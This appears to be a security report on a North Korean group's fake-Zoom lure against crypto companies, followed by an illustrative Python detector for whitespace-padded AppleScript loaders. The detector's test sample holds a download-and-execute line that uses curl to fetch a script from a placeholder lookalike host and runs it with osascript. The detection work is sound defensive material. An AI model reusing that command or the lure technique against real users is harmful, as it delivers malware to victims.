
Fake Zoom meeting invitation used as a lure
The recent attack campaigns against crypto and Web3 companies began in April and were previously documented by Huntabil.it and Huntress, who attributed them to a North Korean subgroup that has been active since at least 2017 and is tracked in the security industry under various names: TA444, BlueNoroff, Sapphire Sleet, Copernicium, Stardust Chollima, or CageyChameleon.
The victims received messages on Telegram from contacts they knew and trusted, inviting them to schedule a meeting through the appointment scheduling service Calendly. They then received a fake email with an invitation to a Zoom meeting, along with instructions to run a "Zoom SDK update script".
This script, called zoom_sdk_support.scpt, is written in AppleScript, a language developed by Apple to control macOS applications. The first-stage script is padded with 10,000 lines of white space to make the malicious code hard to spot; its purpose is to download a second-stage script from another attacker-controlled domain containing the word "zoom". That second-stage script in turn downloads an HTML script that redirects the user to a genuine Zoom meeting link as a distraction while the attack chain continues in the background.
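As an added example (not code from the report or from the researchers cited), the following Python heuristic flags an AppleScript file that shows the two traits described above: a body buried under thousands of blank lines, and a shell-out to a downloader fetching from a zoom-themed lookalike host. The thresholds, the sample script and the domain in it are constructed assumptions for illustration.

```python
import re

# Assumed thresholds: blank lines needed, and share of the file that is blank,
# before the script counts as deliberately padded.
PAD_LINES = 1000
PAD_RATIO = 0.95
# "do shell script" handing off to curl/wget is the loader behaviour described above.
DOWNLOADER = re.compile(r"do shell script.*\b(curl|wget)\b", re.IGNORECASE)
URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def _is_real_zoom(host: str) -> bool:
    return host == "zoom.us" or host.endswith(".zoom.us")


def analyze_applescript(text: str) -> dict:
    """Return padding statistics and a list of human-readable findings."""
    lines = text.splitlines()
    blank = sum(1 for line in lines if not line.strip())
    ratio = blank / len(lines) if lines else 0.0
    findings = []
    if blank >= PAD_LINES and ratio >= PAD_RATIO:
        findings.append(f"whitespace padding: {blank} of {len(lines)} lines blank")
    if DOWNLOADER.search(text):
        findings.append("shells out to a downloader (curl/wget)")
    for url in URL.findall(text):
        host = url.split("/")[2].lower()      # "https://host/path" -> host
        if "zoom" in host and not _is_real_zoom(host):
            findings.append(f"zoom-themed lookalike host: {host}")
    return {"blank_lines": blank, "blank_ratio": round(ratio, 3), "findings": findings}


# Constructed sample: 10,000 blank lines, then a one-line downloader stub.
# The domain is a placeholder under the reserved .example TLD.
SAMPLE = "\n" * 10000 + (
    'do shell script "curl -fsSL https://support.zoom-sdk.example/sdk.scpt '
    '-o /tmp/s && osascript /tmp/s"\n'
)

if __name__ == "__main__":
    for finding in analyze_applescript(SAMPLE)["findings"]:
        print("-", finding)
```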

